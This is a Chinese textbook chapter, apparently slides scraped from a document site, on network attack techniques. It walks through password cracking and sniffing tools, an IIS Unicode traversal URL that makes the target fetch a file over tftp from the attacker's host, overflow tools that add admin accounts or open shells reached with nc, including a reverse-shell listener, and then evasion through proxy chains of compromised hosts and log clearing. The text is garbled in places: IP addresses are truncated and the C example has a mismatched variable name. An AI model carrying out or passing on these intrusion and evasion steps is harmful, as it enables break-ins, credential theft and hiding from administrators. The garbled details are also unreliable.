版權(quán)說(shuō)明:本文檔由用戶提供并上傳,收益歸屬內(nèi)容提供方,若內(nèi)容存在侵權(quán),請(qǐng)進(jìn)行舉報(bào)或認(rèn)領(lǐng)
文檔簡(jiǎn)介
第4章網(wǎng)絡(luò)攻擊技術(shù)4.1信息搜集技術(shù)4.2攻擊實(shí)施技術(shù)4.3隱藏鞏固技術(shù)4.1信息搜集技術(shù)1網(wǎng)絡(luò)踩點(diǎn)2網(wǎng)絡(luò)掃描3網(wǎng)絡(luò)監(jiān)聽(tīng)1網(wǎng)絡(luò)踩點(diǎn)踩點(diǎn)就是通過(guò)各種途徑對(duì)所要攻擊的目標(biāo)進(jìn)行多方面的了解(包括任何可得到的蛛絲馬跡,但要確保信息的準(zhǔn)確)常見(jiàn)的踩點(diǎn)方法包括:在域名及其注冊(cè)機(jī)構(gòu)的查詢公司性質(zhì)的了解對(duì)主頁(yè)進(jìn)行分析郵件地址的搜集目標(biāo)IP地址范圍查詢目的就是探察對(duì)方的各方面情況確定攻擊的時(shí)機(jī)模清除對(duì)方最薄弱的環(huán)節(jié)和守衛(wèi)最松散的時(shí)刻,為下一步的入侵提供良好的策略。思考:每一種方法可得到什么信息呢?2網(wǎng)絡(luò)掃描掃描的目的就是利用各種工具對(duì)攻擊目標(biāo)的IP地址或地址段的主機(jī)查找漏洞。掃描可以分為兩種策略:一種是主動(dòng)式策略:基于網(wǎng)絡(luò)的,它通過(guò)執(zhí)行一些腳本文件模擬對(duì)系統(tǒng)進(jìn)行攻擊的行為并記錄系統(tǒng)的反應(yīng),從而發(fā)現(xiàn)其中的漏洞;另一種是被動(dòng)式策略:基于主機(jī)之上,對(duì)系統(tǒng)中不合適的設(shè)置,脆弱的口令以及其他同安全規(guī)則抵觸的對(duì)象進(jìn)行檢查2.1被動(dòng)式策略掃描被動(dòng)式策略是基于主機(jī)之上,對(duì)系統(tǒng)中不合適的設(shè)置,脆弱的口令以及其他同安全規(guī)則抵觸的對(duì)象進(jìn)行檢查。被動(dòng)式掃描不會(huì)對(duì)系統(tǒng)造成破壞,而主動(dòng)式掃描對(duì)系統(tǒng)進(jìn)行模擬攻擊,可能會(huì)對(duì)系統(tǒng)造成破壞。下面以系統(tǒng)用戶掃描、開(kāi)放端口掃描、共享目錄掃描為例子介紹被動(dòng)式掃描。2.1.1系統(tǒng)用戶掃描使用工具軟件:GetNTUser主要功能包括:掃描出NT主機(jī)上存在的用戶名;自動(dòng)猜測(cè)空密碼和與用戶名相同的密碼;可以使用指定密碼字典猜測(cè)密碼;可以使用指定字符來(lái)窮舉猜測(cè)密碼對(duì)IP為09的計(jì)算機(jī)進(jìn)行掃描,首先將該計(jì)算機(jī)添加到掃描列表中,選擇菜單File下的菜單項(xiàng)“添加主機(jī)”,輸入目標(biāo)計(jì)算機(jī)的IP地址,如圖所示。點(diǎn)擊工具欄上的圖標(biāo),得到的用戶列表如圖所示。利用該工具可以對(duì)計(jì)算機(jī)上用戶進(jìn)行密碼破解,首先設(shè)置密碼字典,設(shè)置完密碼字典以后,將會(huì)用密碼字典里的每一個(gè)密碼對(duì)目標(biāo)用戶進(jìn)行測(cè)試,如果用戶的密碼在密碼字典中就可以得到該密碼。一個(gè)典型的密碼字典如圖所示。選擇菜單欄工具下的菜單項(xiàng)“設(shè)置”,設(shè)置密碼字典為一個(gè)文本文件,如圖所示。利用密碼字典中的密碼進(jìn)行系統(tǒng)破解,選擇菜單欄工具下的菜單項(xiàng)“字典測(cè)試”,程序?qū)凑兆值涞脑O(shè)置進(jìn)行逐一的匹配,如圖所示2.1.2開(kāi)放端口掃描得到對(duì)方開(kāi)放了哪些端口也是掃描的重要一步。使用工具軟件PortScan可以到得到對(duì)方計(jì)算機(jī)都開(kāi)放了哪些端口,主界面如圖所示對(duì)09的計(jì)算機(jī)進(jìn)行端口掃描,在Scan文本框中輸入IP地址,點(diǎn)擊按鈕“START”,開(kāi)始掃描如圖所示2.1.3共享目錄掃描通過(guò)工具軟件Shed來(lái)掃描對(duì)方主機(jī),得到對(duì)方計(jì)算機(jī)提供了哪些目錄共享。工具軟件的主界面如圖所示。該軟件可以掃描一個(gè)IP地址段的共享信息,這里只掃描IP為09的目錄共享情況。在起始IP框和終止IP框中都輸入09,點(diǎn)擊按鈕“開(kāi)始”就可以得到對(duì)方的共享目錄了,如圖所示。2.2主動(dòng)式策略掃描主動(dòng)式策略是基于網(wǎng)絡(luò)的,它通過(guò)執(zhí)行一些腳本文件模擬對(duì)系統(tǒng)進(jìn)行攻擊的行為并記錄系統(tǒng)的反應(yīng),從而發(fā)現(xiàn)其中的漏洞。漏洞掃描使用工具軟件X-Scan-v2.3該軟件的系統(tǒng)要求為:Windows9x/NT4/2000該軟件采用多線程方式對(duì)指定IP地址段進(jìn)行安全漏洞檢測(cè),支持插件功能提供了圖形界面和命令行兩種操作方式掃描內(nèi)容包括:遠(yuǎn)程操作系統(tǒng)類型及版本標(biāo)準(zhǔn)端口狀態(tài)及端口Banner信息SNMP信息,CGI漏洞,IIS漏洞,RPC漏洞,SSL漏洞SQL-SERVER、FTP-SERVER、SMTP-SERVER、POP3-SERVER、NT-SERVER弱口令用戶,NT服務(wù)器NETBIOS信息注冊(cè)表信息等掃描結(jié)果保存在/log/目錄中,index_*.htm為掃描結(jié)果索引文件主界面如下圖所示可以利用該軟件對(duì)系統(tǒng)存在的一些漏洞進(jìn)行掃描,選擇菜單欄設(shè)置下的菜單項(xiàng)“掃描模塊”,掃描模塊的設(shè)置如圖所示選中幾個(gè)復(fù)選框,點(diǎn)擊按鈕“確定”。下面需要確定要掃描主機(jī)的IP地址或者IP地址段,選擇菜單欄設(shè)置下的菜單項(xiàng)“掃描參數(shù)”,掃描一臺(tái)主機(jī),在指定IP范圍框中輸入:09-09,如圖所示。設(shè)置完畢后,進(jìn)行漏洞掃描,點(diǎn)擊工具欄上的圖標(biāo)“開(kāi)始”,開(kāi)始對(duì)目標(biāo)主機(jī)進(jìn)行掃描,如圖所示3網(wǎng)絡(luò)監(jiān)聽(tīng)網(wǎng)絡(luò)監(jiān)聽(tīng)的目的是截獲通信的內(nèi)容,監(jiān)聽(tīng)的手段是對(duì)協(xié)議進(jìn)行分析。Snifferpro就是一個(gè)完善的網(wǎng)絡(luò)監(jiān)聽(tīng)工具。監(jiān)聽(tīng)器Sniffer的原理:在局域網(wǎng)中與其他計(jì)算機(jī)進(jìn)行數(shù)據(jù)交換的時(shí)候,發(fā)送的數(shù)據(jù)包發(fā)往所有的連在一起的主機(jī),也就是廣播,在報(bào)頭中包含目標(biāo)機(jī)的正確地址。因此只有與數(shù)據(jù)包中目標(biāo)地址一致的那臺(tái)主機(jī)才會(huì)接收數(shù)據(jù)包,其他的機(jī)器都會(huì)將包丟棄。但是,當(dāng)主機(jī)工作在監(jiān)聽(tīng)模式下時(shí),無(wú)論接收到的數(shù)據(jù)包中目標(biāo)地址是什么,主機(jī)都將其接收下來(lái)。然后對(duì)數(shù)據(jù)包進(jìn)行分析,就得到了局域網(wǎng)中通信的數(shù)據(jù)。一臺(tái)計(jì)算機(jī)可以監(jiān)聽(tīng)同一網(wǎng)段所有的數(shù)據(jù)包,不能監(jiān)聽(tīng)不同網(wǎng)段的計(jì)算機(jī)傳輸?shù)男畔ⅰ?網(wǎng)絡(luò)監(jiān)聽(tīng)防止監(jiān)聽(tīng)的手段是:建設(shè)交換網(wǎng)絡(luò)、使用加密技術(shù)和使用一次性口令技術(shù)。除了非常著名的監(jiān)聽(tīng)軟件SnifferPro以外,還有一些常用的監(jiān)聽(tīng)軟件:嗅探經(jīng)典--Iris密碼監(jiān)聽(tīng)工具--WinSniffer密碼監(jiān)聽(tīng)工具--pswmonitor和非交換環(huán)境局域網(wǎng)的fssniffer等等SnifferPro是一款非常著名監(jiān)聽(tīng)的工具,但是SnifferPro不能有效的提取有效的信息。3.1監(jiān)聽(tīng)工具-WinSniffer
WinSniffer專門(mén)用來(lái)截取局域網(wǎng)內(nèi)的密碼,比如登錄FTP,登錄Email等的密碼。主界面如圖所示只要做簡(jiǎn)單的設(shè)置就可以進(jìn)行密碼抓取了,點(diǎn)擊工具欄圖標(biāo)“Adapter”,設(shè)置網(wǎng)卡,這里設(shè)置為本機(jī)的物理網(wǎng)卡就可以,如圖所示這樣就可以抓取密碼了,使用DOS命令行連接遠(yuǎn)程的FTP服務(wù),如圖所示打開(kāi)WinSniffer,看到剛才的會(huì)話過(guò)程已經(jīng)被記錄下來(lái)了,顯示了會(huì)話的一些基本信息,如圖所示3.2監(jiān)聽(tīng)工具-pswmonitor
監(jiān)聽(tīng)器pswmonitor用于監(jiān)聽(tīng)基于WEB的郵箱密碼、POP3收信密碼和FTP登錄密碼等等,只需在一臺(tái)電腦上運(yùn)行,就可以監(jiān)聽(tīng)局域網(wǎng)內(nèi)任意一臺(tái)電腦登錄的用戶名和密碼,并將密碼顯示、保存,或發(fā)送到用戶指定的郵箱,主界面如圖所示。該工具軟件功能比較強(qiáng)大,可以監(jiān)聽(tīng)的一個(gè)網(wǎng)段所有的用戶名和密碼,而且還可以指定發(fā)送的郵箱,設(shè)置的界面如圖所示。4.2攻擊實(shí)施技術(shù)4.2.1社會(huì)工程攻擊4.2.2
口令攻擊4.2.3
漏洞攻擊4.2.4
欺騙攻擊4.2.5
拒絕服務(wù)攻擊4.2.1
社會(huì)工程攻擊社會(huì)工程是使用計(jì)謀和假情報(bào)去獲得密碼和其他敏感信息的科學(xué)所謂“社會(huì)工程學(xué)攻擊”,就是利用人們的心理特征,騙取用戶的信任,獲取機(jī)密信息、系統(tǒng)設(shè)置等等不公開(kāi)資料,為黑客攻擊和病毒感染創(chuàng)造有利條件。4.2.1
社會(huì)工程攻擊社會(huì)工程學(xué)是一種利用人的弱點(diǎn)如人的本能反應(yīng)、好奇心、信任、貪便宜等弱點(diǎn)進(jìn)行諸如欺騙、傷害等危害手段,獲取自身利益的手法。包括:1、打電話請(qǐng)求密碼2、偽造Email3、免費(fèi)下載軟件中捆綁流氓軟件、免費(fèi)音樂(lè)中包含病毒、網(wǎng)絡(luò)釣魚(yú)、垃圾電子郵件中包括間諜軟件4、安全設(shè)置技術(shù)陷阱和更改手機(jī)號(hào)碼顯示騙取錢(qián)財(cái)4.2.1
社會(huì)工程攻擊-網(wǎng)絡(luò)釣魚(yú)攻擊
網(wǎng)絡(luò)釣魚(yú)攻擊指黑客使用欺詐郵件和虛假網(wǎng)頁(yè)來(lái)誘騙收件人提供信用卡帳號(hào)、用戶名、密碼、社會(huì)福利號(hào)碼等,隨后利用騙得的帳號(hào)和密碼竊取受騙者金錢(qián)的一種攻擊方式。詳見(jiàn)錄像4.2.2
口令攻擊1.1物理攻擊1.2暴力攻擊1.3其他方式1.1物理攻擊物理攻擊是來(lái)自能夠接觸到物理設(shè)備的用戶的攻擊主要有兩種攻擊:獲取管理員密碼攻擊提升權(quán)限攻擊1.1物理攻擊獲取管理員密碼攻擊條件:攻擊者接觸到物理設(shè)備,并且可以使用離開(kāi)(計(jì)算機(jī)未鎖定或者以自己的密碼登錄直接讓其他人使用)實(shí)現(xiàn):將FindPass.exe拷貝到C盤(pán)根目錄,執(zhí)行該程序,即可以得到管理員密碼等信息原因:所有的用戶信息都存儲(chǔ)在系統(tǒng)的一個(gè)進(jìn)程winlogon.exe中,可以利用使用FindPass等工具可以對(duì)該進(jìn)程進(jìn)行解碼,將當(dāng)前登錄用戶的密碼解碼出來(lái)(如下頁(yè)圖)1.1物理攻擊1.1物理攻擊提升權(quán)限攻擊條件:擁有一個(gè)普通帳戶(管理員給其他用戶建立一個(gè)普通用戶帳號(hào),認(rèn)為這樣就安全了)實(shí)現(xiàn):用普通用戶帳號(hào)登錄后,可以利用工具GetAdmin.exe將自己加到管理員組或者新建一個(gè)具有管理員權(quán)限的用戶1.2暴力攻擊暴力攻擊是指利用計(jì)算機(jī)的處理能力和一定的信息去直接的猜試密碼的攻擊方式.字典攻擊是最常見(jiàn)的一種暴力攻擊利用人的習(xí)慣思維,并嘗試各種可能的組合來(lái)猜測(cè)密碼強(qiáng)壯的密碼可有效擊敗字典攻擊,它應(yīng)該由多位字母、數(shù)字、通配符組成暴力破解操作系統(tǒng)密碼可以用工具軟件GetNTUser暴力破解電子郵箱密碼可以用工具軟件:黑雨——POP3郵箱密碼暴力破解器下一節(jié)工具軟件GetNTUser返回黑雨——POP3郵箱密碼暴力破解器返回1.3其他方式網(wǎng)絡(luò)嗅探(sniffer)通過(guò)嗅探器在局域網(wǎng)內(nèi)嗅探明文傳輸?shù)目诹钭址?。鍵盤(pán)記錄在目標(biāo)系統(tǒng)中安裝鍵盤(pán)記錄后門(mén),記錄操作員輸入的口令字符串,如很多間諜軟件,木馬等都可能會(huì)盜取你的口令。4.2.3
漏洞攻擊3.1Unicode漏洞3.2
緩沖區(qū)溢出漏洞3.3
打印漏洞3.1Unicode漏洞何謂Unicode?國(guó)際標(biāo)準(zhǔn)組織于1984年4月成立ISO/IECJTC1/SC2/WG2工作組,針對(duì)各國(guó)文字、符號(hào)進(jìn)行統(tǒng)一性編碼1991年美國(guó)跨國(guó)公司成立UnicodeConsortium,并于1991年10月與WG2達(dá)成協(xié)議,采用同一編碼字集Unicode于1992年6月通過(guò)DIS(DrafInternationalStandard),目前版本V2.0于1996公布,內(nèi)容包含符號(hào)6811個(gè),漢字20902個(gè),韓文拼音11172個(gè),造字區(qū)6400個(gè),保留20249個(gè),共計(jì)65534個(gè)3.1Unicode漏洞Unicode漏洞是2000-10-17發(fā)布的,受影響的版本:MicrosoftIIS5.0+MicrosoftWindows2000系列版本MicrosoftIIS4.0+MicrosoftWindowsNT4.0微軟IIS4.0和5.0都存在利用擴(kuò)展UNICODE字符取代“/”和“\”而能利用“../”目錄遍歷的漏洞。在Windows的目錄結(jié)構(gòu)中,可以使用兩個(gè)點(diǎn)和一個(gè)斜線“../”來(lái)訪問(wèn)上一級(jí)目錄,例如:在瀏覽器中“scripts/../../winnt/system32”就訪問(wèn)到系統(tǒng)的系統(tǒng)目錄了瀏覽器地址欄中禁用符號(hào)“../”,但是可以使用符號(hào)“/”的Unicode的編碼。比如“/scripts/..%c0%2f../winnt/system32/cmd.exe?/c+dir”中的“%c0%2f”就是“/”的Unicode編碼3.1Unicode漏洞利用Unicode漏洞進(jìn)行的攻擊讀取出計(jì)算機(jī)上目錄列表讀取對(duì)方計(jì)算機(jī)上裝了幾個(gè)操作系統(tǒng)使用Unicode漏洞刪除主頁(yè)利用Unicode漏洞入侵系統(tǒng)讀取出計(jì)算機(jī)上目錄列表讀取對(duì)方計(jì)算機(jī)上裝了幾個(gè)操作系統(tǒng)使用Unicode漏洞刪除主頁(yè)利用Unicode漏洞入侵系統(tǒng)
目標(biāo):利用Unicode可以入侵對(duì)方的系統(tǒng),并得到管理員權(quán)限。在地址欄上執(zhí)行命令,用戶的權(quán)限比較低,像net等系統(tǒng)管理指令不能執(zhí)行。攻擊三個(gè)步驟:1、首先需要向?qū)Ψ椒?wù)器上傳一些文件在本地建立tftp服務(wù)器,首先在本地計(jì)算機(jī)上搭建一個(gè)TFTP服務(wù)器,可以使用
tftpd32.exe建立服務(wù)器普通文件傳輸協(xié)議TFTP(TextFileTransmissionProtocol)一般用來(lái)傳輸單個(gè)文件。上傳一個(gè)名為“idq.dll”的文件在瀏覽器中執(zhí)行命令:09/scripts/..%c0%2f../winnt/system32/cmd.exe?/c+tftp+-i+10+get+idq.dll上傳完畢后可以查看一下scripts目錄,是否真的上傳成功了2、接著使用工具軟件ispc.exe入侵對(duì)方系統(tǒng)拷貝ispc.exe文件到本地計(jì)算機(jī)的C盤(pán)根目錄,在DOS命令行下執(zhí)行命令:“ispc.exe09/scripts/idq.dll”,連接成功后就直接進(jìn)入了對(duì)方的DOS命令行下,而且具有管理員權(quán)限,入侵的過(guò)程所示3、可以在對(duì)方計(jì)算機(jī)上做管理員可以做的一切事情比如添加用戶,建立一個(gè)用戶名為“Hacker123”,密碼也是“Hacker123”的用戶,如圖所示3.2
緩沖區(qū)溢出漏洞緩沖區(qū)溢出攻擊是目前最流行的一種攻擊技術(shù)。當(dāng)目標(biāo)操作系統(tǒng)收到了超過(guò)了它的最大能接收的信息量的時(shí)候,將發(fā)生緩沖區(qū)溢出。這些多余的數(shù)據(jù)將使程序的緩沖區(qū)溢出,然后覆蓋了實(shí)際的程序數(shù)據(jù),緩沖區(qū)溢出使目標(biāo)系統(tǒng)的程序被修改,經(jīng)過(guò)這種修改的結(jié)果使在系統(tǒng)上產(chǎn)生一個(gè)后門(mén)。這項(xiàng)攻擊對(duì)技術(shù)要求比較高,但是攻擊的過(guò)程卻非常簡(jiǎn)單。緩沖區(qū)溢出原理很簡(jiǎn)單,比如程序:3.2
緩沖區(qū)溢出漏洞voidfunction(char*szPara1){ charbuff[16];
strcpy(buffer,szPara1);}程序中利用strcpy函數(shù)將szPara1中的內(nèi)容拷貝到buff中,只要szPara1的長(zhǎng)度大于16,就會(huì)造成緩沖區(qū)溢出。存在strcpy函數(shù)這樣問(wèn)題的C語(yǔ)言函數(shù)還有:strcat()、gets()、scanf()等。最常見(jiàn)的是通過(guò)制造緩沖區(qū)溢出使程序運(yùn)行一個(gè)用戶shell,利用該shell,可以進(jìn)行相關(guān)操作shell?相對(duì)于內(nèi)核來(lái)講3.2
緩沖區(qū)溢出漏洞3.2.1RPC溢出漏洞3.2.2
利用IIS溢出入侵系統(tǒng)3.2.3
WebDav遠(yuǎn)程溢出WebDAV
是一種行業(yè)標(biāo)準(zhǔn),是HTTP規(guī)范的擴(kuò)展“WebDAV”中的“DAV”代表分布式制作和版本控制“distributedauthoringandversioning”WebDAV為授權(quán)用戶提供了在Web服務(wù)器上遠(yuǎn)程添加和管理內(nèi)容的功能3.2.1RPC漏洞溢出遠(yuǎn)程過(guò)程調(diào)用RPC(RemoteProcedureCall),是操作系統(tǒng)的一種消息傳遞功能,允許應(yīng)用程序呼叫網(wǎng)絡(luò)上的計(jì)算機(jī)。當(dāng)系統(tǒng)啟動(dòng)的時(shí)候,自動(dòng)加載RPC服務(wù)。可以在服務(wù)列表中看到系統(tǒng)的RPC服務(wù),如圖5-35所示。3.2.1RPC漏洞溢出
利用RPC漏洞建立超級(jí)用戶RPC溢出漏洞,對(duì)SP4也適用,必須打?qū)S醚a(bǔ)丁。利用工具scanms.exe文件檢測(cè)RPC漏洞,該工具是ISS安全公司2003年7月30日發(fā)布的,運(yùn)行在命令行下用來(lái)檢測(cè)指定IP地址范圍內(nèi)機(jī)器是否已經(jīng)安裝了“DCOMRPC接口遠(yuǎn)程緩沖區(qū)溢出漏洞(823980-MS03-026)”補(bǔ)丁程序。如果沒(méi)有安裝補(bǔ)丁程序,該IP地址就會(huì)顯示出“[VULN]”。首先拷貝該文件到C盤(pán)根目錄,現(xiàn)在要檢查地址段09到10的主機(jī),執(zhí)行命令“scanms.exe09-10”,檢查過(guò)程如圖5-36所示。3.2.1RPC漏洞溢出
檢查緩沖區(qū)溢出漏洞3.2.1RPC漏洞溢出
利用緩沖區(qū)溢出漏洞利用工具軟件attack.exe對(duì)09進(jìn)行攻擊。攻擊的結(jié)果將在對(duì)方計(jì)算機(jī)上建立一個(gè)具有管理員權(quán)限的用戶,并終止了對(duì)方的RPC服務(wù)。新建用戶的用戶名和密碼都是qing10,這樣就可以登錄對(duì)方計(jì)算機(jī)了,RPC服務(wù)停止操作系統(tǒng)將有許多功能不能使用,非常容易被管理員發(fā)現(xiàn),使用工具軟件OpenRpcSs.exe來(lái)給對(duì)方重啟RPC服務(wù)。攻擊的全過(guò)程如圖5-37所示。3.2.1RPC漏洞溢出
攻擊的全過(guò)程3.2.2
利用IIS溢出進(jìn)行攻擊案例5-11利用IIS溢出入侵系統(tǒng)利用軟件SnakeIIS溢出工具可以讓對(duì)方的IIS溢出,還可以捆綁執(zhí)行的命令和在對(duì)方計(jì)算機(jī)上開(kāi)辟端口,工具軟件的主界面如圖5-38所示。
3.2.2
利用IIS溢出進(jìn)行攻擊該軟件適用于各種類型的操作系統(tǒng),比如對(duì)09進(jìn)行攻擊,09的操作系統(tǒng)的Windows2000,沒(méi)有安裝補(bǔ)丁程序,攻擊完畢后,開(kāi)辟一個(gè)813端口,并在對(duì)方計(jì)算機(jī)上執(zhí)行命令“dirc:\”設(shè)置如圖5-39所示。3.2.2
利用IIS溢出進(jìn)行攻擊點(diǎn)擊按鈕“IDQ溢出”,出現(xiàn)攻擊成功的提示框,如圖5-40所示。3.2.2
利用IIS溢出進(jìn)行攻擊這個(gè)時(shí)候,813端口已經(jīng)開(kāi)放,利用工具軟件nc.exe連接到該端口,將會(huì)自動(dòng)執(zhí)行改才發(fā)送的DOS命令“dirc:\”,使用的語(yǔ)法是:nc.exe-vv09813,其中-vv是程序的參數(shù),813是目標(biāo)端口。可以看到命令的執(zhí)行結(jié)果,如圖5-41所示。3.2.2
利用IIS溢出進(jìn)行攻擊
另外一種攻擊方式下面利用nc.exe和snake工具的另外一種組合入侵對(duì)方計(jì)算機(jī)。首先利用nc.exe命令監(jiān)聽(tīng)本地的813端口。使用的基本語(yǔ)法是“nc-l-p813”,執(zhí)行的過(guò)程如圖5-42所示。3.2.2
利用IIS溢出進(jìn)行攻擊這個(gè)窗口就這樣一直保留,啟動(dòng)工具軟件snake,本地的IP地址是10,要攻擊的計(jì)算機(jī)的IP地址是09,選擇溢出選項(xiàng)中的第一項(xiàng),設(shè)置IP為本地IP地址,端口是813,如圖5-43所示。3.2.2
利用IIS溢出進(jìn)行攻擊
設(shè)置好以后,點(diǎn)擊按鈕“IDQ溢出”,程序顯示對(duì)話框如圖4-44所示。3.2.2
利用IIS溢出進(jìn)行攻擊查看nc命令的DOS框,在該界面下,已經(jīng)執(zhí)行了設(shè)置的DOS命令。將對(duì)方計(jì)算機(jī)的C盤(pán)根目錄列出來(lái),如圖4-45所示。3.2.3
利用WebDav遠(yuǎn)程溢出需要使用工具軟件nc.exe和webdavx3.exe,首先在DOS命令行下執(zhí)行webdavx3.exe,如果執(zhí)行的話,該程序?qū)⑻崾疽呀?jīng)過(guò)期了,如圖4-46所示。3.2.3
利用WebDav遠(yuǎn)程溢出攻擊修改本地系統(tǒng)時(shí)間到2001年,這樣就可以攻擊了,在命令后面直接跟對(duì)方的IP地址就可以了,現(xiàn)在要攻擊的計(jì)算機(jī)是09,執(zhí)行情況如圖4-47所示。3.2.3
利用WebDav遠(yuǎn)程溢出入該程序不能自動(dòng)退出,當(dāng)發(fā)現(xiàn)程序長(zhǎng)時(shí)間沒(méi)有反映的時(shí)候,需要手工按下“CTRL+C”退出程序。該程序在對(duì)方的計(jì)算機(jī)上開(kāi)了一個(gè)端口7788,依然可以nc.exe程序入侵對(duì)方的計(jì)算機(jī),過(guò)程如圖4-48所示。3.3
利用打印漏洞利用打印漏洞可以在目標(biāo)的計(jì)算機(jī)上添加一個(gè)具有管理員權(quán)限的用戶攻擊方法:使用工具軟件:cniis.exe使用的語(yǔ)法格式是:“cniis090”,第一個(gè)參數(shù)是目標(biāo)的IP地址,第二參數(shù)是目標(biāo)操作系統(tǒng)的補(bǔ)丁號(hào),這里是0,因?yàn)?9沒(méi)有打補(bǔ)丁拷貝cniis.exe文件到C盤(pán)根目錄,執(zhí)行程序如圖所示3.3
利用打印漏洞4
欺騙攻擊3.1IP地址欺騙攻擊3.2DNS欺騙攻擊3.3web欺騙攻擊3.4E-mail欺騙攻擊3.5ARP欺騙攻擊3.2DNS欺騙攻擊RSA的域名被黑客劫持,當(dāng)用戶連上RSAsecurity時(shí),發(fā)現(xiàn)主頁(yè)被改成了其他的內(nèi)容。DNS欺騙的基本原理是:域名解析過(guò)程中,假設(shè)當(dāng)提交給某個(gè)域名服務(wù)器的域名解析請(qǐng)求的數(shù)據(jù)包被截獲,然后按截獲者的意圖將一個(gè)虛假的IP地址作為應(yīng)答信息返回給請(qǐng)求者。3.3web欺騙攻擊web欺騙的基本原理是攻擊者通過(guò)偽造某個(gè)www站點(diǎn)的影像拷貝,使該影像web的入口進(jìn)入攻擊者的web服務(wù)器,并經(jīng)過(guò)攻擊者計(jì)算機(jī)的過(guò)濾作用,從而達(dá)到攻擊者監(jiān)控受攻擊者的任何活動(dòng)以獲取有用信息的目的,這些信息當(dāng)然包括用戶的賬戶和口令。2008-4-14警方公布10個(gè)假淘寶3.4E-mail欺騙攻擊電子郵件欺騙是指攻擊者佯稱自己為系統(tǒng)管理員(郵件地址和系統(tǒng)管理員完全相同),給用戶發(fā)送郵件要求用戶修改口令(口令可能為指定字符串)或在貌似正常的附件中加載病毒或其他木馬程序。例如,欺騙者冒充群發(fā)一個(gè)郵件,“隨機(jī)有獎(jiǎng)抽查,填好用戶號(hào)碼和密碼就有機(jī)會(huì)獲得一份精美的禮品?!币源耸占畔ⅰ?.5ARP欺騙攻擊ARP是地址解析協(xié)議,負(fù)責(zé)將IP地址轉(zhuǎn)換為MAC地址。一臺(tái)主機(jī)從網(wǎng)上接收到的任何ARP應(yīng)答都會(huì)更新自己的地址映射表,而不管其是否真實(shí)。ARP欺騙正是利用這個(gè)缺陷。3.5ARP欺騙攻擊5
拒絕服務(wù)攻擊拒絕服務(wù)攻擊的簡(jiǎn)稱是:DoS(DenialofService)攻擊,凡是造成目標(biāo)計(jì)算機(jī)拒絕提供服務(wù)的攻擊都稱為DoS攻擊,其目的是使目標(biāo)計(jì)算機(jī)或網(wǎng)絡(luò)無(wú)法提供正常的服務(wù)。最常見(jiàn)的DoS攻擊是:計(jì)算機(jī)網(wǎng)絡(luò)帶寬攻擊和連通性攻擊帶寬攻擊是以極大的通信量沖擊網(wǎng)絡(luò),使網(wǎng)絡(luò)所有可用的帶寬都被消耗掉,最后導(dǎo)致合法用戶的請(qǐng)求無(wú)法通過(guò)。連通性攻擊指用大量的連接請(qǐng)求沖擊計(jì)算機(jī),最終導(dǎo)致計(jì)算機(jī)無(wú)法再處理合法用戶的請(qǐng)求。4拒絕服務(wù)攻擊SYN風(fēng)暴:tcp三次握手協(xié)議,利用假ip+半連接實(shí)現(xiàn)資源耗盡,達(dá)到攻擊目的Smurf攻擊利用ip欺騙+icmp協(xié)議實(shí)現(xiàn)攻擊目的利用處理程序錯(cuò)誤PingofdeathTeardropLand攻擊4拒絕服務(wù)攻擊詳見(jiàn)錄象隱身鞏固技術(shù)當(dāng)入侵主機(jī)以后,通常入侵者的信息就被記錄在主機(jī)的日志中比如IP地址、入侵的時(shí)間以及做了哪些破壞活動(dòng)等等,為了防止入侵的痕跡被發(fā)現(xiàn),需要隱藏或者清除入侵的痕跡實(shí)現(xiàn)隱身有兩種方法:設(shè)置代理跳板清除系統(tǒng)日志鞏固入侵戰(zhàn)果—留后門(mén):為了保持對(duì)已經(jīng)入侵的主機(jī)長(zhǎng)久的控制,需要在主機(jī)上建立網(wǎng)絡(luò)后門(mén),以后可以直接通過(guò)后門(mén)入侵系統(tǒng)。4.3隱身鞏固技術(shù)1設(shè)置代理跳板2清除日志3留后門(mén)1設(shè)置代理跳板當(dāng)從本地入侵其他主機(jī)的時(shí)候,自己的IP會(huì)暴露給對(duì)方。通過(guò)將某一臺(tái)主機(jī)設(shè)置為代理,通過(guò)該主機(jī)再入侵其他主機(jī),這樣就會(huì)留下代理的IP地址,這樣就可以有效的保護(hù)自己的安全。二級(jí)代理的基本結(jié)構(gòu)如下圖所示1設(shè)置代理跳板二級(jí)代理的基本結(jié)構(gòu)1設(shè)置代理跳板本地通過(guò)兩級(jí)代理入侵某一臺(tái)主機(jī),這樣在被入侵的主機(jī)上,就不會(huì)留下的自己的信息??梢赃x擇更多的代理級(jí)別,但是考慮到網(wǎng)絡(luò)帶寬的問(wèn)題,一般選擇兩到三級(jí)代理比較合適。選擇代理服務(wù)的原則是選擇不同地區(qū)的主機(jī)作為代理。比如現(xiàn)在要入侵北美的某一臺(tái)主機(jī),選擇南非的某一臺(tái)主機(jī)作為一級(jí)代理服務(wù)器,選擇北歐的某一臺(tái)計(jì)算機(jī)作為二級(jí)代理,再選擇南美的一臺(tái)主機(jī)作為三級(jí)代理服務(wù)器,這樣很安全了。可以選擇做代理的主機(jī)有一個(gè)先決條件,必須先安裝相關(guān)的代理軟件,一般都是將已經(jīng)被入侵的主機(jī)作為代理服務(wù)器。1設(shè)置代理跳板常用的網(wǎng)絡(luò)代理跳板工具很多,這里介紹一種比較常用而且功能比較強(qiáng)大的代理工具:Snake代理跳板。Snake的代理跳板,支持TCP/UDP代理,支持多個(gè)(最多達(dá)到255)跳板。程序文件為:SkSockServer.exe,代理方式為Socks,并自動(dòng)打開(kāi)默認(rèn)端口1813監(jiān)聽(tīng)。設(shè)置代理跳板步驟:A、每一級(jí)跳板主機(jī)上安裝Snake代理服務(wù)器,安裝步驟見(jiàn)下圖。程序文件是SkSockServer.exe,將該文件拷貝到目標(biāo)主機(jī)上。B、使用本地代理配置工具:SkServerGUI.exe,選擇主菜單“配置”下的菜單項(xiàng)“經(jīng)過(guò)的SKServer”,配置經(jīng)過(guò)的代理C、選擇主菜單“配置”下的菜單項(xiàng)“客戶端“,設(shè)置可以訪問(wèn)代理的客戶端,D、選擇菜單欄“命令”下的菜單項(xiàng)“開(kāi)始”,啟動(dòng)該代理跳板下一節(jié)安裝Snake代理服務(wù)器設(shè)置經(jīng)過(guò)的代理服務(wù)器設(shè)置可以訪問(wèn)代理的客戶端啟動(dòng)代理跳板2清除系統(tǒng)日志清除日志是黑客入侵的最后的一步,黑客能做到來(lái)無(wú)蹤去無(wú)影,這一步起到?jīng)Q定性的作用2.1清除IIS日志2.2清除主機(jī)日志2.1清除IIS日志當(dāng)用戶訪問(wèn)某個(gè)IIS服務(wù)器以后,無(wú)論是正常的訪問(wèn)還是非正常的訪問(wèn),IIS都會(huì)記錄訪問(wèn)者的IP地址以及